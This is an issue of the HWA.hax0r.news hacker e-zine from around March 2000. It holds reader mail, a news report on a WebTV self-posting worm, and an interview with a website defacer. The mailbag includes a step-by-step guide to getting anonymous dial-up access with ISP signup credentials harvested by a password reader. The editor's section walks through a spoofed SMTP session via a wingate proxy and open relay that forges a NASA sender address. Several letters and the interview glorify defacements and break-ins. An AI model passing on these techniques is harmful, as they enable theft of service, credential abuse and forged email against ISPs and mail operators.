VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: cruciphux@dok.org Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@gmx.net......: currently active/programming/IRC+ pyra......................: currently active/crypto queen Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia Spikeman .........................: World Media/IRC channel enforcer HWA members ......................: World Media Armour (armour@halcon.com.au).....: Australia Wyze1.............................: South Africa Xistence..........................: German/Dutch translations Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. New members/affiliates Xistence ..... General news and Dutch/German translations sP|a|Zm ..... Swedish news / translations SugarKing ..... General news articles * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs* Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ theduece ytcracker loophole BlkOps MostHated vetesgirl Slash bob- CHEVY* Debris pr1zm JimJones Dragos Ruiu pr0xy MR^CHAOS Eckis Fuqrag Messiah v00d00 meliksah dinkee omnihil sP|a|Zm OE KillNow iPulse erikR prizm paluka Xistence doobee phold hi ;) {} mixter merXor abattis Xistence #darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I /storm/ did you do it yet? ;-) i'll get your shit in here soon.. promise :) shouts to Xochitl13 for sending the cool postcard with a pic of the la 2600 meeting place. cheers dude! Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) And many others, sorry if i missed you or forgot you! mail me and i'll flail myself unforgivingly in front of my open bedroom window until I bleed, then maybe, add u to the list (please, don't ask for pics...) Also mad props to doobee and the CCC (Chaos Computer Club) in Germany for setting up a new listserv system to help distribute the zine. (Will be in action soon, I have admin work to do first and testruns..). :-))) Ken Williams/tattooman ex-of PacketStorm, SpaceRogue for running a kick ass news net Emmanuel Goldstein for pure staying power All the crackers, hackers and phreakers The sysadmins, NOC controllers, network engineers IRCops, security professionals, tiger team operatives military cyberwar grunts, feds and 'special computer unit' coppers trying to keep shit together in this anarchic chaos. AND Kevin Mitnick (free at last, stay free this time man...) Kevin was released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ Recently reported 'helping' out the feds with security advice! kewl sites: + http://hackdesk.dhs.org/ NEW -> NEWBIE help + MORE + http://www.hack.co.za **DOWN ** EfNet channel: #darknet + http://blacksun.box.sk. + http://packetstorm.securify.com/ + http://www.securityportal.com/ + http://www.securityfocus.com/ + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://www.pure-security.net/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 Since we provide only the links in this section, be prepared for 404's - Ed +++ When was the last time you backed up your important data? ++ http://zcaofficedirectory.com/ Beware of "pay-per-call" Area Code 809 SCAM! Do not respond to e-mails, phone calls, or pages which inform you to call Caribbean Islands Area Code " 809 " phone number. If you call from the United States, you will be apparently be charged $25.00 per minute (without being warned beforehand). It's important to prevent becoming a victim of this SCAM. Check all area codes before returning a call. Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** NEW WEB BOARD! *** ======================================================================== The message board has been REVIVED with a new script and is doing quite well. Check it out http://discserver.snap.com/Indices/103991.html . Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed ======================================================================= * An interesting usenet email with a cool telephony URL to check out: * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 25 Feb 2000 12:33:09 -0600 From: "Jennifer 'AstroJenn' Martino" Subject: Re: HWA.hax0r.news Underground Security Organization: Not today. Not yesterday. And probably not tomorrow. To: Cruciphux Reply To: jennmartino@my-deja.com i have a few phone sounds that you might be interested in.. cycle tone sweeper, switch verification messages, unidentifiable messages, those recordings that say a bunch of numbers, spit out touch tones and hang up, test messages, etc. less interesting than the above, but i also have recordings of some odd error messages, loops, blue box tones, red box tones, touch tones, ccitt5, a call from a jail. when applicable, the filename is the actual phone number i called to recieve the sound. unfortunately they are not in ram nor mp3 formats but.. you can find my collection at hope that helps, jenn -- The Web Page You Have Reached http://twpyhr.usuck.com Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes FAQ" "The Phoney Dance. A collection of telephone graphics. Jenn's Joint http://jennsays.usuck.com My Ob-Personal Page. -=- Freebie net hack ... these things are everywhere now, if you can't get net access for free or dirt cheap you're paranoid or living under a rock :-) ... of course remember, you get what you pay for - Ed From: M* H* To: Sent: Friday, March 24, 2000 9:58 AM Subject: submission I wrote this text just know, thought it might be usefull (dont use my realname or something plz). Grtz, m-m ------------------------------------------------------------------------------- ************************************************************ * HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS * * m-m * ************************************************************ YOU'LL NEED: Windoze (I'm sorry!) A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com) One of them ISP CD's with the M$ Internet Connection Wizzard HOW DOES IT WORK: For the ones that don't know that the internet connection wizzard is, i'll explain quickly. Since ISP's are constantly dying to get new members, they (sometimes) give away free CD's with magazines and stuff. All ICW does is make a temporary connnection to a server, get some HTML, run Internet Explorer in fullscreen and have you fill in some stupid forms which will be CGI'd to the administration so you'll get your internet accout... and the bill. Filling in false info can be usefull, but won't work long + it's illegal. For the temporary connection to the server ICW just makes a new Dial-up connection. So what you need to do is just boot up one of them CD's, make that connection, alt+tab away and use the PWL Reader to get the temporary info for the account. Cancel your subscribing and throw away the CD. The connection gets deleted from your dialup's automaticly to prevent such abuse. Load up your normal internet connection and go to that ISP's website. Go for technical support and get the nearest PoP. (Read: telephone number to log in). Now make a new dialup connection with that number and the login name and password you just earned with the PWL reader. Voilla. You're connected. (Note: these are usually guest/guest or stuff like that). Try reaching a external website (i.a. www.news.insource.nl). If can't connect it probably means the ISP was smart and blocked all external traffic for the sign up account. I've tried this on several ISP's and it worked most of the time. Some ISP's were smart enough to block such jokes but some weren't. Since free internet is a fact these days this is only usefull to remain anonymous. (if you're hacking or something). end of email -=- From: Dragos Ruiu To: <*> Sent: Thursday, March 23, 2000 10:53 PM Subject: kyxspam: hnn hacked? After fielding TV reporter questions on the subject... I tried to go see what HNN had to say about Max, and www.hackernews.com got me a page that said: White House White House WhiteHouse White House WHite House

White House

... definitely not what I was looking for .... -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com -=- Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious) possibly a dns grab, unknown at this time ... i'd have expected HNN to acknowledge any hacks successful or not. Site whitehouse.com is a porn site... take that as you will. -=- From: Mr. Unknown To: Sent: Wednesday, March 22, 2000 7:18 PM First I want to say the zine is kickass. SugarKing pointed me to the lastest one. Read it last nite at work. That really sux that Fuqrag was raided. I work at a place where he did a defacement and maybe some other stuff. ;) Since then, I have been interested about what else he was doing. Only could catch the latest defacements, though. I get a good laugh at work when the servers go down and say "FUQRAG IS BACK!" They freak! haa haa so funny it really pisses them off. They won't listen to me about our networks security since I am only a pc tech. and they are big MSCE's. I thought MSCE's had to know their shit? They set up a ftp server and told everyone that it didn't allow anonymous log in, ha, should've seen their faces when some good pics should up in their personal directories. After they still hadn't figured out who it was, I told them how to fix that problem. What do you know, the next day my admin rights were gone, and the test account another admin setup for me was gone. Even showed them problems with asp. It's just pissing them off and they are not doing anything about it. Not even patching old holes. Very discouraging for me, when I can show them how to fix their shit. You would think after being hacked they would do something. reading the interview with fuqrag was some kewl shit. I hope they take it easy on em. I hope he writes some articles for the zine, too. Anyway I just wanted to let you know that the zine kicks ass and content is good. I wish to be as 313373 as fuqrag!! Keep up the great work mr.unknown ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com -=- The kind of mail we love getting ... :-) - Ed And some interesting SPAM ?!? Dear Web Master, Do you want to know how your computer skills rate? Take a FREE Brainbench certification exam ONLINE and find out how good your IT skills really are. Everyday, thousands of technical professionals take a FREE Brainbench certification exam online to rate their skills. They use the test results to get a better understanding of their strengths and weaknesses or to earn a certification that helps them get a better job. It only takes a moment to register online for an exam. You will then immediately receive your FREE test access code, which will allow you to take the multiple-choice exam anytime within the next 30 days. Register NOW at http://destinationsite.com/c?c=71838.2597.0.3128.0 If you pass the exam, Brainbench will certify your skill and mail you an attractive 81/2" x 11" certificate FREE! Plus you can make your certification available online if you choose. As the world's leading skills certification authority, Brainbench certifications are recognized by major employers and staffing organizations throughout the world. ============================================================ Register for any FREE exam NOW and automatically enter a monthly drawing for $500. http://destinationsite.com/c?c=71838.2597.0.3128.1 Take advantage of this great offer! Pass it along to your friends! Brainbench has 60 different exams to choose from! ============================================================ How does it work? 1) Register for an exam at http://destinationsite.com/c?c=71838.2597.0.3128.2 There are about 60 exams to choose from. You will receive instructions on how to complete the exam when you register. 2) When it is convenient for you, enter your test code at the Brainbench website. You will take the multiple-choice exam online. It will take about 45 minutes. You can take it ANYTIME from ANYPLACE using a common web browser. (version 3.0 or later preferred). 3) As soon as you finish the exam, you can view your test results including your skill rating (on a scale of 1.00 - 5.00) with a list of your strengths and weaknesses. To certify you need a score of 2.75 or higher. To certify as a Master, you need a score of 4.00 or higher. The test engine is computer-adaptive, meaning it will adjust to your skill level so whether you are a novice or an expert, it will ask questions that are close to your skill level. 4) All your information is held private unless you allow it to be released. Who recognizes Brainbench certifications? 1) Virtually all employers recognize Brainbench certifications- we are the leading independent certification authority with over 500,000 exams ordered last year! 2) Top technology companies and top staffing companies use Brainbench exams to screen their technical staffs, including: Ernst & Young, EDS, CSC, PriceWaterhouseCoopers, kforce.com, JP Morgan and many others. 3) Due to Brainbench's secure adaptive-testing method, employer's trust the Brainbench approach to validating a job candidate's skills. What does it mean to be certified? 1) It means you join the ranks of those professionals who can prove that they have the credentials to do a job. Employers will be more likely to put their trust in you. 2) You can pursue, with confidence, the jobs you want. 3) Whether you pass or not, every time you take the test you will receive a private report on your strengths and weaknesses as well your personal ranking in the industry. Is it really FREE? Yes. There is absolutely NO CHARGE to you. You can take the exam FREE. We'll mail your certificate, FREE. There are no hidden costs. We are doing this because we want to grow the number of people who receive the benefit of a Brainbench certification exam. We will eventually charge people to take the exam, but for now it is FREE. So enjoy, and please- pass this on to your friends. Register now for your FREE exam: at http://destinationsite.com/c?c=71838.2597.0.3128.3 Mike Littman Cofounder, Brainbench, The skills authority -=- From: To: Sent: Saturday, March 18, 2000 5:42 AM Subject: Need a hand? ... I mean, Help? Hello, there... I came across your HWA newsletter. I read you are looking for help. I have no clue about hacking and all the magic that you guys do. I can tell you it fascinate me, and I've been reading attrition for quite a while. I work with computers (as in: Dummy 101 . Can't expect much from blondes...*ugh*) I'm originally from Italy. So, If you ever came across something to translate from Italian to English I would be more than happy to help you out. I'd like to keep a very-very low profile. No profile at all would even be better. Just my 2 Cents. You're doing a wonderful job... Ciao, ciao Simona -=- Don't usually post these, but just to prove we do get offers of help so don't sit there get up and do something too! :-)) - Ed -=- Using cablemodem? especially on the @HOME network? expect weird shit the teething problems aren't over .. heres an interesting diatribe from Dragos on some recent @home-isms ... - Ed : From: Dragos Ruiu To: <*> Sent: Monday, March 20, 2000 11:58 PM Subject: kyxquestions: @home puke Here are more puzzles for all you armchair hacker sleuths... In the last two days my cablemodem has started spewing ICMP Host Unreachable packets from a local 10.11.* address to seemingly random addresses but each address is repeated multiple times. Most of the dest hosts are in 207.230.246.* We are talking about lots of packets here... every couple of min. This was preceeded by the unusual occurrence of 10.11.* -> 10.11.* traffic. Which was followed by mapping and poking at random 10.11.* addresses from varied addresses. 10.11 is where @ home puts their cablemodems. As to why I would be seeing this stuff on the client side of my cablemodem that's a good question - expecially those 10.11 -> 10.11 packets. I haven't ruled out some flaky modem or router yet blasting garbage into the ether, and @home has been having to "reboot their servers" a lot lately. Other wierd stuff is broadcasts from 10.11.* hosts on port 121 to subnet broadcast addresses. Looking back into the logs shows that this kind ICMP storm has happened in the past weeks on and off a couple of times. Interestingly, before today... the destination was always in the 172.16.*.* address space. Each time, the activity starts, is heavily active and then stops within minutes.... only today it seems to be going on and not abating and it seems to like destinations of 207.230.246.[170,253] (what looks like a name server {woop, woop, danger will robinson} and a test box at vsb.bc.ca and 24.112.31.56 and 172.16.6.195 (no reverse dns lookup avail) as it's favorite destinations. Todays activity seems to all come from one cablemodem and the activity in the past seemed to vary in source modem address. The single source says to me that it may just be one flaky modem. Now I gotta go and find where the whois registry for the ca domain hides. Miscelaneous crud: 24.113.85.105 cr547339-a.surrey1.bc.wave.home.com which seems to be running some sort of port-1080-wingate sort of thing has been trying to log in to an ftp server here, when he oughtn't. And lots and lots of the typical wingate scans and along with oodles of the not so common yet Trin00/TrojanCow/DeepThroat 3.1 traffic/scans. Anybody got a good rundown/synopsis of DeepThroat or Trojan Cow they can point me to? I have to go see what ArachNIDS says. BTW for those that are keeping score Trojan Cow seems to be the winner in the number of hosts infected dept. if the # of different sources of the broadcasts and volume are any indication. Bottom line: Something is wierd and new. We also had a runaway lynx process on one server.... now I hear there is a new remote overflow in it (Safer) - but that is just circumstancial evidence. That plus another potentially false outbound xterm trigger all leads to the old spidey senses saying... fee fi fo fum... I smell hacking. P.p.s. for Max and the rules guys... outbound nmap TCP connect scans seem to false the "AOL chat data" rules in snort, not sure if that's in vision.conf or rapidnet set yet but I find this a useful falsing that lets me log outbound nmaps I initiate. :-) -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com -=- * From the Web board: * ~~~~~~~~~~~~~~~~~~~~~~~~ (Didn't pull any from the board, check it out, some interesting stuff on there... - Ed) @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include #include #include main() { printf ("Read commented source!\n\n"); /* Another monthly release... oh well read on. * * * Cruci * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Congrats, thanks, articles, news submissions and kudos to us at the main address: cruciphux@dok.org complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 Clearing up a nasty screw up in issue #51, here's what happened... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I fucked up. Two 'versions' of #51 were actually released, a few early birds got the "bad" copy. The 'real' copy has (2) in the upper left very top corner. Collectors edition! :-) Details? nah you wouldn't be interested anyways.... -=- @HWA 04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NOTE: I had a gracious offer from *someone* the last time HACK.CO.ZA needed hosting but unfortunately my mailbox had corrupted and I lost this message before I could forward it to the site owner Gov-Boi, if after reading this you can still offer services, please send another email to me at cruciphux@dok.org... thanks! @HWA 05.0 WebTV hit by "Melissa-Type" virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: Merxenary Source: C|Net http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002. WebTV hit by Melissa-like bug By Stephanie Miles Staff Writer, CNET News.com March 17, 2000, 3:55 p.m. PT WebTV has been hit by a self-replicating bug that is wreaking havoc with the network's message boards and newsgroups, a situation that knocks back the company's claim that it is immune to viruses and security holes. The problem, which some are calling the "Flood Virus," gets inside the e-mail system of WebTV owners and prompts the WebTV settop box to litter bulletin board and newsgroup sites on the company's network with redundant junk mail. Like the Melissa virus, the malicious WebTV code sends out the emails under a user's name without their knowledge. Melissa-type viruses cause damage by clogging email servers of corporations and organizations with illegitimate emails. For WebTV users, the chief problem so far has come in trying to read the intra-network web sites. Bulletin boards on the WebTV network only show five postings at a time. An outbreak of the Flood Virus therefore makes it very difficult for users to find relevant messages on the board. Subscribers also face potential embarrassment, as emails under their name are posted to newsgroups without their knowledge. Microsoft, which owns WebTV, has confirmed the existence of the problem but claims the situation is a hack rather than a virus. The company added that the problem is not widespread. Whatever the root cause of the problem, the situation is black eye for the service. One of WebTV's marketing pitches has been that subscribers do not have to worry about rogue viruses on the Internet. Microsoft also has had a tempestuous relationship with segments of its subscriber base over technological issues in the past. After gaining attention as the first firm to offer Internet service through the television, WebTV has struggled to build its subscriber base and has encountered criticism from users for failing to support standard Web technologies such as Java. The company was acquired by Microsoft in 1997. WebTV was recently forced to reverse course and remove banner ads from emails viewed and stored on the site in response to a flood of customer complaints. The backlash comes as WebTV faces a looming challenge from Internet service giant America Online, which is set to launch its AOL TV sometime this summer. The problem was first discovered by Net4TV, which tracks interactive television. Net4TV came up with the Flood Virus name. "It's absolutely self-replicating. It inserts the virus code into the signature upon opening the email or going to the newsgroup," said Brian Bock, editor in chief at Net4TV. The general public does not have to worry about the flaw. It can only come in e-mails from WebTV units and it only effects other WebTV boxes. In addition, all of the excess mail is currently being directed at newsgroups and bulletin boards on the company's network. The WebTV network is written mainly in HTML, and the company uses HTML shortcuts for certain network features, according to Net4TV. Shortcuts within user's email signature files, the calling card at the bottom of an e-mail message, serve as the entryway for the malicious code. The code manipulates the signature file and then prompts the Web TV unit to post repeatedly to WebTV newsgroups. WebTV representatives could not confirm this account of how the network is set up. Nonetheless, they acknowledged it exists. "It's a fundamental flaw in the WebTV architecture," Bock said. Although WebTV currently counts about one million subscribers, Microsoft is marketing portions of the service along with its TV Pak to cable service providers as Microsoft TV. If portions of the WebTV browser are easily susceptible to these types of attacks, Bock said, it does not bode well for Microsoft TV if it is installed on a widespread basis through cable providers. "It points to a larger problem," he said, calling for an independent security analysis of the WebTV architecture, similar to that which took place with Microsoft's Hotmail free email service after suffering repeated privacy breaches. "It points to what else may be going on under there." For its part, WebTV says the problem has only hit a very small number of WebTV Classic users. According to Microsoft, hackers combined two known WebTV hacks: one which inserts malicious code into the user's email signature file, and one which inserts malicious code into postings on the newsgroup itself. "These two codes were linked together," a spokesperson said, asserting that only 14 of the 594,000 WebTV Classic users have reported being infected with the bug. WebTV had previously created fixes for the two separate problems when they originally surfaced. The company is working on a more comprehensive patch to be released next week. In the meantime, users should open their signature file to check if any new text or code has been inserted, the WebTV representative said. @HWA 06.0 BlaznWeed interview, background info, and Sect0r ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Cruciphux BlaznWeed contacted me regarding commenting on some of the things Sect0r said in the interview last issue, so we address those and get a general interview as well... mildly edited to remove general chatter. - Ed Interview date: Sun Mar 19/2000 By: Cruciphux Session Start: Sun Mar 19 15:26:53 2000 [15:26] Session Ident: BlaznWeed (some1@*.*.*.uk) [15:26] i'm ready [15:27] ok hi.. sorry to keep ya waiting [15:27] np [15:27] i'm pretty informal, no real structure [15:28] thats fine by me [15:28] i'll do the preliminary intro questions ... [15:28] like age interest group affiliations etc [15:28] i'm 20 and my group is wkD [15:29] whats wkD stand for? [15:29] and how long has it been around? [15:29] wicked [15:29] how many members and where are they based? [15:29] how did you meet? irc? [15:29] : [15:29] there are many members [15:30] and i don't know them all [15:30] some in other groups too? [15:30] I got introduced to wkD by zeroc [15:30] who is the founder [15:30] I don't think so [15:30] but i can't say for sure [15:30] he hangs on dalnet mostly [15:31] you too? [15:31] yeah [15:31] why dalnet? any reason? [15:31] Most of my freinds are on dalnet [15:31] how long have you been on the net? [15:32] about three four years [15:32] to [15:32] how long have you been into computers? same time or longer? [15:32] the nets is relatively new here in the uk [15:32] longer [15:32] about six maybe 7 [15:33] how would you classify yourself? ie: hacker cracker coder scriptkid [15:33] and do you code? if so in what? [15:33] hehe [15:33] yes i do code [15:34] but i haven't written my own exploits yet [15:34] oh I forgot 'defacer' [15:34] :) [15:34] i'm a full time computer science student [15:34] i suppose i'd be labeled a cracker [15:34] so you break into sites but don't deface all of them? [15:35] If i manage to break into a unix box i don't defeace them [15:35] about how many have you done? [15:35] simply because i have other uses for them [15:35] and how long have you been doing it? [15:35] but the N boxes i have no use for [15:35] nod [15:36] maybe a couple of years now [15:36] i started of hacking nothing but unix boxes [15:36] what is your home machine? if more than one box whats your setup? [15:36] I actually enjoy playing hide a nd seek with admins [15:36] heh [15:36] battle of wits [15:37] I'm just running linux at home [15:37] but i used to eun solaris [15:37] but the thing with solaris is that it doesn't run very well on x86 proccesssors [15:38] so i'm stuck with linux until i can afford a sparc [15:38] I don't like solaris [15:38] solaris and linux are like blondes and brunettes i like em both [15:38] :D [15:38] and its worse on x86 processors [15:39] what about *BSD? [15:39] its closer to real unix than linux* [15:39] I haven't tried that [15:39] though i do have a couple of bsd shells [15:39] legit ones mind [15:40] without giving details outline a typical hack, ie: what do you use as a base point, do you use pbx or redirectors to dial into hacked accts etc, what country do you use etc [15:40] yeah i notice [15:41] no comment [15:41] hehe [15:41] damn that was the most interesting too [15:41] :) [15:41] :) [15:43] well i suppose this interview gives me the perfect opportunity to address some of the misleading comments written by secto0r in the last issue of hwa [15:43] I was about to approach that [15:43] initially sect0r said he and you were 'ok' after the defacement log incident [15:44] yeah i thought we were ok too [15:44] "He" claims i'm a wannabe with no skills, [15:44] this is funny since it was only the other day he asked me [15:44] to deface a web site for him [15:45] hrm [15:45] 